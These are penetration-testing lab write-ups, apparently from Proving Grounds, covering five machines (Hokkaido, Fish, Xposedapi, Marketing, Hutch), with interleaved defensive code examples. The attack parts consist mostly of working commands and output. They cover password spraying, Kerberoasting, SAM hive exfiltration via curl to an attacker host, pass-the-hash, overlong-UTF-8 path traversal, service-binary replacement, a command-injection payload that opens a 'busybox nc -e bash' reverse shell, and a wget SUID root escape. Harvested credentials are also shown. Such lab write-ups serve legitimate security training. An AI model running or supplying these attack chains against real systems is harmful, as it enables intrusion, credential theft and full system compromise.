SMB 192.168.217.40 445 DC Julian.Davies 2023-11-25 13:34:17 0
SMB 192.168.217.40 445 DC Hannah.O'Neill 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Rachel.Jones 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Declan.Woodward 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Annette.Buckley 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Elliott.Jones 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Grace.Lees 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Deborah.Francis 2023-11-25 13:34:18 0
SMB 192.168.217.40 445 DC Bruce.Cartwright 2023-11-25 13:34:21 0
SMB 192.168.217.40 445 DC Nigel.Brown 2023-11-25 13:34:21 0
SMB 192.168.217.40 445 DC Derek.Wyatt 2023-11-25 13:34:21 0
SMB 192.168.217.40 445 DC discovery 2023-12-06 15:42:56 0
SMB 192.168.217.40 445 DC maintenance 2023-11-25 13:39:04 0
SMB 192.168.217.40 445 DC hrapp-service 2023-11-25 14:14:40 0
SMB 192.168.217.40 445 DC info 2023-12-06 15:43:50 0
SMB 192.168.217.40 445 DC [*] Enumerated 33 local users: HAERO
SMB 192.168.217.40 445 DC [*] Writing 33 local users to users
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc smb 192.168.217.40 -u users -p Start123! | grep +
SMB 192.168.217.40 445 DC [+] hokkaido-aerospace.com\discovery:Start123!
Initial Access
BloodHound shows that the newly obtained account DISCOVERY@HOKKAIDO-AEROSPACE.COM is part of the service group.

Trying MSSQL shows that this account can use the service.
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!'
MSSQL 192.168.217.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.217.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
After logging in, the account cannot read other databases or execute shell commands. Checking with nxc reveals a login it can impersonate, which leads to a set of credentials.
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!' -M mssql_priv
MSSQL 192.168.217.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.217.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
MSSQL_PRIV 192.168.217.40 1433 DC [*] HAERO\discovery can impersonate: hrappdb-reader
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!' -M mssql_priv -o ACTION=privesc
MSSQL 192.168.217.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.217.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
MSSQL_PRIV 192.168.217.40 1433 DC [*] HAERO\discovery can impersonate: hrappdb-reader
MSSQL_PRIV 192.168.217.40 1433 DC [-] can't find any path to privesc
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ impacket-mssqlclient 'hokkaido-aerospace.com'/'discovery':'Start123!'@'192.168.217.40' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (HAERO\discovery guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------------- --------------
b'LOGIN' b'' IMPERSONATE GRANT HAERO\services hrappdb-reader
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader';
SQL (hrappdb-reader guest@master)> SELECT name FROM sys.databases;
name
-------
master
tempdb
model
msdb
hrappdb
SQL (hrappdb-reader guest@master)> use hrappdb;
ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT name FROM sys.tables;
name
-------
sysauth
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
id name password
-- ---------------- ----------------
0 b'hrapp-service' b'Untimed$Runny'
SQL (hrappdb-reader hrappdb-reader@hrappdb)>
With hrapp-service in hand, the full attack path becomes clear.

Obtain a Kerberoast hash for Hazel.Green and crack it to get the password haze1988.
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ python3 ~/tools/AD/targetedKerberoast/targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$f2d19b90e90d2beb8c7d0dc14f2f916b$...[hash truncated]
[VERBOSE] SPN removed successfully for (Hazel.Green)
HAZEL.GREEN is a member of TIER2-ADMINS, and TIER2-ADMINS has ForceChangePassword over MOLLY.SMITH, so MOLLY.SMITH's password is changed directly.
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ bloodyAD --host 192.168.217.40 -d hokkaido-aerospace.com -u Hazel.Green -p haze1988 set password MOLLY.SMITH pwn
[+] Password changed successfully!
RDP in, and local.txt is obtained.

Privilege Escalation
molly.smith is in the Tier1-Admins group.
PS C:\Users\MOLLY.SMITH> net user molly.smith
User name Molly.Smith
Full Name Molly Smith
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/1/2025 10:02:49 PM
Password expires Never
Password changeable 7/2/2025 10:02:49 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/1/2025 10:25:46 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Tier1-Admins
*it
The command completed successfully.
Open PowerShell with Run as administrator to see the full set of privileges molly.smith holds.
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeSystemtimePrivilege Change the system time Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Dump the SAM and SYSTEM hives.
PS C:\Users\MOLLY.SMITH> reg save hklm\sam sam
The operation completed successfully.
PS C:\Users\MOLLY.SMITH> reg save hklm\system system
The operation completed successfully.
PS C:\Users\MOLLY.SMITH> curl.exe -F files=@sam http://192.168.45.181:8000/upload
PS C:\Users\MOLLY.SMITH> curl.exe -F files=@system http://192.168.45.181:8000/upload
PS C:\Users\MOLLY.SMITH>
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
Proof
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ evil-winrm -u 'Administrator' -H 'd752482897d54e239376fddb2a2109e4' -i '192.168.217.40'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> type desktop\proof.txt
e13b02f4b6ace5c8233b9513886d5c85
*Evil-WinRM* PS C:\Users\Administrator>
Fish
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
|---|---|
| 192.168.217.168 | TCP:135,139,445,3389,3370,4848,5040,6060,7676,7776,8080,8181,8686 |
Web enumeration
Port 4848 runs a service with an arbitrary file read vulnerability; port 6060 runs SynaMan 5.1.
Initial Access
Research shows that SynaMan keeps its credential file under C:\SynaMan\config; the other service's arbitrary file read vulnerability retrieves it.
┌──(kali㉿kali)-[~/oscp/pg/Fish]
└─$ curl "http://192.168.217.168:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/SynaMan/config/AppConfig.xml"
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
<parameters>
<parameter name="adminEmail" type="1" value="admin@fish.pg"></parameter>
<parameter name="smtpSecurity" type="1" value="None"></parameter>
<parameter name="jvmPath" type="1" value="jre/bin/java"></parameter>
<parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"></parameter>
<parameter name="httpPortSSL" type="2" value="-1"></parameter>
<parameter name="httpPort" type="2" value="0"></parameter>
<parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"></parameter>
<parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"></parameter>
<parameter name="lastSelectedTab" type="1" value="1"></parameter>
<parameter name="emailServerWebServicePort" type="2" value=""></parameter>
<parameter name="imagePath" type="1" value="images/"></parameter>
<parameter name="defaultOperation" type="1" value="frontPage"></parameter>
<parameter name="publicIPForUrl" type="1" value=""></parameter>
<parameter name="flags" type="2" value="2"></parameter>
<parameter name="httpPort2" type="2" value="6060"></parameter>
<parameter name="useUPnP" type="4" value="true"></parameter>
<parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter>
<parameter name="smtpUser" type="1" value="arthur"></parameter>
<parameter name="InitialSetupComplete" type="4" value="true"></parameter>
<parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
<parameter name="failureOverHttpPort" type="2" value="55222"></parameter>
<parameter name="smtpPort" type="2" value="25"></parameter>
<parameter name="httpIP" type="1" value=""></parameter>
<parameter name="emailServerWebServiceHost" type="1" value=""></parameter>
<parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter>
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
</parameters>
</Configuration>
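An added example (not code from the box or from either product) of why the %c0%ae%c0%ae/ sequence in the request above gets past a traversal check, and how a strict decoder stops it. lenient_utf8 models a decoder that accepts overlong two-byte sequences; naive_resolve and safe_resolve are hypothetical handlers, and the /srv/app web root is an assumption.

```python
"""Overlong UTF-8 and path traversal. %c0%ae is an overlong encoding of '.'
(0x2E). A lenient decoder turns it into '.', so "%c0%ae%c0%ae/" becomes "../"
only after a traversal check that looked at the raw request text has passed.
"""
from urllib.parse import unquote_to_bytes
import posixpath


def lenient_utf8(data):
    """Decoder that accepts overlong 2-byte sequences (models the vulnerable behaviour)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # 110xxxxx 10yyyyyy -> code point, without checking it really needed 2 bytes
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def naive_resolve(url_path, webroot="/srv/app"):
    """Vulnerable: traversal check on the still-encoded text, lenient decode afterwards."""
    if ".." in url_path:
        raise PermissionError("traversal rejected")
    decoded = lenient_utf8(unquote_to_bytes(url_path))
    return posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))


def safe_resolve(url_path, webroot="/srv/app"):
    """Hardened: percent-decode, decode strictly (overlong sequences are an error),
    normalise, then check that the result is still inside the web root."""
    try:
        decoded = unquote_to_bytes(url_path).decode("utf-8")   # strict: rejects C0 AE
    except UnicodeDecodeError:
        raise PermissionError("invalid UTF-8 in path")
    full = posixpath.normpath(posixpath.join(webroot, decoded.lstrip("/")))
    if full != webroot and not full.startswith(webroot + "/"):
        raise PermissionError("traversal rejected")
    return full


# Constructed request path shaped like the one sent to port 4848 above.
PAYLOAD = "theme/META-INF/" + "%c0%ae%c0%ae/" * 10 + "SynaMan/config/AppConfig.xml"


def escaped_webroot(handler, url_path, webroot="/srv/app"):
    """True if the handler resolved url_path to a file outside webroot."""
    try:
        full = handler(url_path, webroot)
    except PermissionError:
        return False
    return full != webroot and not full.startswith(webroot + "/")


if __name__ == "__main__":
    print("naive:", naive_resolve(PAYLOAD))          # leaves /srv/app entirely
    print("safe escapes webroot:", escaped_webroot(safe_resolve, PAYLOAD))
```

The same decode-before-check ordering matters for %2e%2e, %252e and backslash variants; canonicalise once, then apply every security check to the canonical form.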
RDP in.

Privilege Escalation
PowerUp check:
ServiceName : domain1
Path : C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
ModifiableFile : C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'domain1'
CanRestart : False
Name : domain1
Check : Modifiable Service Files
Confirm once more that the service binary is writable, then replace it.
PS C:\Users\arthur> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\arthur> icacls C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\arthur> mv C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe.bak
PS C:\Users\arthur> cp //192.168.45.181/share/pwn.exe C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
PS C:\Users\arthur>
After rebooting the machine, the reverse shell comes back as SYSTEM.
┌──(kali㉿kali)-[~/oscp/pg/Fish]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.181] from (UNKNOWN) [192.168.217.168] 49668
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
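The condition PowerUp reported above (a service binary that Authenticated Users can modify) can be audited from plain icacls output. This is an added example, not part of the original writeup or of PowerUp; the sample listing is constructed from the icacls lines shown for domain1Service.exe.

```python
#!/usr/bin/env python3
"""Audit an icacls listing for the condition PowerUp flagged above:
a service binary that Authenticated Users (or Users/Everyone) can modify.

Added example, not part of the original writeup or of PowerUp. The sample
listing is constructed from the icacls lines shown for domain1Service.exe.
"""
import re

# Principals every logged-on account belongs to; a write grant here is a finding.
LOW_PRIV_PRINCIPALS = {
    "NT AUTHORITY\\Authenticated Users",
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls simple rights (F, M, W) and specific rights (WD, AD, D, WDAC, WO)
# that let the holder replace or alter the file or its DACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "WDAC", "WO"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# "<principal>:(I)(F)" or "<principal>:(RX,WD)" -- one ACE per line
ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<flags>(?:\([^)]*\))+)$")


def parse_aces(path, icacls_output):
    """Return [(principal, {rights})] for one file.

    icacls prints the file path only on the first ACE line, so the caller
    passes the path it queried and it is stripped from that line.
    """
    aces = []
    for raw in icacls_output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:            # blank line or the "Successfully processed" summary
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            rights.update(r.strip() for r in group.split(","))
        aces.append((m.group("who"), rights - INHERITANCE_FLAGS))
    return aces


def modifiable_by_low_priv(path, icacls_output):
    """Principals in LOW_PRIV_PRINCIPALS holding any write-capable right.
    For a service that starts as LocalSystem, any hit here is a
    SYSTEM-level escalation path; only Administrators/SYSTEM should
    hold Modify on the binary and its directory."""
    findings = []
    for who, rights in parse_aces(path, icacls_output):
        hit = rights & WRITE_RIGHTS
        if who in LOW_PRIV_PRINCIPALS and hit:
            findings.append((who, sorted(hit)))
    return findings


# Constructed sample, shaped like the icacls output shown above.
SAMPLE_PATH = r"C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe"
SAMPLE_ICACLS = SAMPLE_PATH + r""" BUILTIN\Administrators:(I)(F)
                NT AUTHORITY\SYSTEM:(I)(F)
                BUILTIN\Users:(I)(RX)
                NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for who, rights in modifiable_by_low_priv(SAMPLE_PATH, SAMPLE_ICACLS):
        print(f"FINDING: {who} has {','.join(rights)} on {SAMPLE_PATH}")
```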
Xposedapi
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.104.134 | TCP:22,13337 |
Web enumeration
Port 13337 runs a web service. Visiting /logs shows "Access Denied for this Host."; setting the header x-forwarded-for: localhost bypasses it. The page then asks for a file parameter over GET; this parameter has a path traversal and can read /etc/passwd. Via /logs?file=main.py the site's source code can be read.
Tidied up, it reads as follows:
#!/usr/bin/env python3
from flask import Flask, jsonify, request, render_template, Response
from Crypto.Hash import MD5
import json, os, binascii

app = Flask(__name__)


@app.route('/')
def home():
    return render_template("home.html")


@app.route('/update', methods=["POST"])
def update():
    if request.headers['Content-Type'] != "application/json":
        return "Invalid content type."
    else:
        data = json.loads(request.data)
        if data['user'] != "clumsyadmin":
            return "Invalid username."
        else:
            # data['url'] is spliced into a shell command line: command injection
            os.system("curl {} -o /home/clumsyadmin/app".format(data['url']))
            return "Update requested by {}. Restart the software for changes to take effect.".format(data['user'])


@app.route('/logs')
def readlogs():
    # X-Forwarded-For is client-supplied, so the "localhost" check is bypassable
    if request.headers.getlist("X-Forwarded-For"):
        ip = request.headers.getlist("X-Forwarded-For")[0]
    else:
        ip = "1.3.3.7"
    if ip == "localhost" or ip == "127.0.0.1":
        if request.args.get("file") is None:
            return "Error! No file specified. Use file=/path/to/log/file to access log files.", 404
        else:
            # file= is opened unvalidated: path traversal / arbitrary file read
            with open(request.args.get("file"), 'r') as f:
                data = f.read()
            return render_template("logs.html", data=data)
    else:
        return "WAF: Access Denied for this Host.", 403


@app.route('/version')
def version():
    hasher = MD5.new()
    with open("/home/clumsyadmin/app", 'rb') as f:
        d = f.read()
    hasher.update(d)
    appHash = binascii.hexlify(hasher.digest()).decode()
    return "1.0.0b{}".format(appHash)


@app.route('/restart', methods=["GET", "POST"])
def restart():
    if request.method == "GET":
        return render_template("restart.html")
    else:
        os.system("killall app")
        os.system("bash -c '/home/clumsyadmin/app&'")
        return "Restart Successful."
Initial Access
/update is vulnerable to command injection; a test confirms it works.
┌──(kali㉿kali)-[~/oscp/pg/XposedAPI]
└─$ curl -X POST http://192.168.104.134:13337/update \
-H "Content-Type: application/json" \
-d '{"user": "clumsyadmin", "url": ";ping -c 4 192.168.45.243;"}'
Update requested by clumsyadmin. Restart the software for changes to take effect.
---
┌──(kali㉿kali)-[~]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
22:57:03.054524 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 1, length 64
22:57:03.056629 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 1, length 64
22:57:04.057069 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 2, length 64
22:57:04.057091 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 2, length 64
22:57:05.058390 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 3, length 64
22:57:05.058406 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 3, length 64
22:57:06.059865 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 4, length 64
22:57:06.059881 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 4, length 64
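Hardened replacements for the three defects in main.py above (the X-Forwarded-For trust in /logs, the unrestricted open() behind file=, and the os.system() string in /update that the ping test just exercised), written as plain functions so they can be tested without Flask. This is an added example, not the application's code; LOG_DIR and UPDATE_HOST are assumed placeholders with no equivalent in the original app.

```python
#!/usr/bin/env python3
"""Hardened replacements for the three defects in main.py above, written as
plain functions so they can be tested without Flask.

Added example, not the application's code. LOG_DIR and UPDATE_HOST are
assumed placeholders; the original app has no equivalent settings.
"""
import os
import subprocess
from urllib.parse import urlparse

LOG_DIR = "/var/log/xposedapi"           # assumed: where log files are allowed to live
UPDATE_HOST = "updates.example.invalid"  # assumed: the only host updates may come from


def client_is_local(remote_addr):
    """/logs trusted the first X-Forwarded-For value, which any client can set.
    Decide on the socket peer address instead. (Behind a reverse proxy you
    control, apply werkzeug's ProxyFix with the exact number of trusted hops
    rather than reading the header by hand.)"""
    return remote_addr in ("127.0.0.1", "::1")


def resolve_log_path(requested):
    """/logs passed ?file= straight to open(), so file=/etc/passwd or
    file=main.py read anything the process could. Confine the name to
    LOG_DIR after resolving '..' and symlinks; return None when it escapes.
    Absolute input is neutralised too: os.path.join discards the base, and
    the prefix check then rejects the result."""
    if not requested:
        return None
    base = os.path.realpath(LOG_DIR)
    candidate = os.path.realpath(os.path.join(base, requested))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate


def validate_update_url(url):
    """Allow only https URLs to the pinned host with no embedded credentials.
    An injection string such as ';ping -c 4 ...;' has no scheme and is rejected."""
    try:
        parts = urlparse(url)
    except ValueError:          # e.g. malformed IPv6 literal
        return False
    return (parts.scheme == "https"
            and parts.hostname == UPDATE_HOST
            and parts.username is None
            and parts.password is None)


def build_update_argv(url, dest="/home/clumsyadmin/app"):
    """/update did os.system("curl {} -o ...".format(url)): the URL was spliced
    into a shell command line. Build an argv list instead; with shell=False
    the URL is one literal argument and ';', '&', '|' have no meaning."""
    if not validate_update_url(url):
        raise ValueError("update URL rejected")
    return ["curl", "--fail", "--silent", "--location", url, "-o", dest]


def run_update(url):
    """Fetch the update without a shell; returns the CompletedProcess."""
    return subprocess.run(build_update_argv(url), shell=False, check=False, timeout=60)
```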
Proof
┌──(kali㉿kali)-[~]
└─$ curl -X POST http://192.168.104.134:13337/update \
-H "Content-Type: application/json" \
-d '{"user": "clumsyadmin", "url": ";busybox nc 192.168.45.243 4444 -e bash;"}'
---
┌──(kali㉿kali)-[~/oscp/pg/XposedAPI]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.104.134] 55626
python3 -c 'import pty;pty.spawn("/bin/bash")'
clumsyadmin@xposedapi:~/webapp$ cd ~
cd ~
clumsyadmin@xposedapi:~$ ls
ls
app local.txt webapp
clumsyadmin@xposedapi:~$ cat local.txt
cat local.txt
d302915ee9a68152e245ced494ccea3a
clumsyadmin@xposedapi:~$
Privilege Escalation – SUID
clumsyadmin@xposedapi:~$ TF=$(mktemp)
chmod +x $TF
TF=$(mktemp)
clumsyadmin@xposedapi:~$ chmod +x $TF
clumsyadmin@xposedapi:~$ echo -e '#!/bin/bash -p\n/bin/bash -p 1>&0' >$TF
echo -e '#!/bin/bash -p\n/bin/bash -p 1>&0' >$TF
clumsyadmin@xposedapi:~$ /usr/bin/wget --use-askpass=$TF 0
/usr/bin/wget --use-askpass=$TF 0
bash-5.0# id
id
uid=1000(clumsyadmin) gid=1000(clumsyadmin) euid=0(root) groups=1000(clumsyadmin)
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
33a3dd42641cc13beb1942c9e8d449bd
bash-5.0#
Marketing
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.200.225 | TCP:22,80 |
Web enumeration
Enumeration finds an /old/ directory; comparing the links on the two pages shows that /old has one extra.
┌──(kali㉿kali)-[~/oscp/pg/Marketing]
└─$ curl http://192.168.200.225/ | grep -Eo '([a-zA-Z0-9.-]+\.[a-zA-Z]{2,}|[0-9]{1,3}(\.[0-9]{1,3}){3})' | sort -u | wc -l
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 18286 100 18286 0 0 86508 0 --:--:-- --:--:-- --:--:-- 86254
37
┌──(kali㉿kali)-[~/oscp/pg/Marketing]
└─$ curl http://192.168.200.225/old/ | grep -Eo '([a-zA-Z0-9.-]+\.[a-zA-Z]{2,}|[0-9]{1,3}(\.[0-9]{1,3}){3})' | sort -u | wc -l
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 20423 100 20423 0 0 95506 0 --:--:-- --:--:-- --:--:-- 95434
38
The comparison reveals an extra hostname, customers-survey.marketing.pg; add it to /etc/hosts.
┌──(kali㉿kali)-[~]
└─$ echo "192.168.200.225 customers-survey.marketing.pg" | sudo tee -a /etc/hosts
[sudo] password for kali:
192.168.200.225 customers-survey.marketing.pg
That site runs LimeSurvey, which has an authenticated RCE.
Initial Access
The exploit gets part of the way; finishing the failing step by hand, following its error output, gives a www-data shell. The MySQL connection password is in the config file.
www-data@marketing:/var/www/LimeSurvey/application/config$ cat config.php
cat config.php
<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| 'connectionString' Hostname, database, port and database type for
| the connection. Driver example: mysql. Currently supported:
| mysql, pgsql, mssql, sqlite, oci
| 'username' The username used to connect to the database
| 'password' The password used to connect to the database
| 'tablePrefix' You can add an optional prefix, which will be added
| to the table name when using the Active Record class
|
*/
return array(
'components' => array(
'db' => array(
'connectionString' => 'mysql:host=localhost;port=3306;dbname=limesurvey;',
'emulatePrepare' => true,
'username' => 'limesurvey_user',
'password' => 'EzPwz2022_dev1$$23!!',
'charset' => 'utf8mb4',
'tablePrefix' => 'lime_',
),
Trying t.miller/EzPwz2022_dev1$$23!! over SSH succeeds.
Proof
t.miller@marketing:~$ cat
.bash_history .bash_logout .bashrc .cache/ local.txt .profile
t.miller@marketing:~$ cat local.txt
b31310e9f2a5b0888c2ea2e83cd35ab3
t.miller@marketing:~
Hutch
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.206.122 | TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 |
ldap enum
With ldapsearch, the password CrabSharkJellyfish192 turns up in a description attribute; it belongs to the user fmcsorley.
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ ldapsearch -x -H ldap://192.168.206.122 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=hutch,DC=offsec
namingcontexts: CN=Configuration,DC=hutch,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=hutch,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=hutch,DC=offsec
namingcontexts: DC=ForestDnsZones,DC=hutch,DC=offsec
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ ldapsearch -x -H ldap://192.168.206.122 -D '' -w '' -b "DC=hutch,DC=offsec"
(output omitted)
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
hange on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
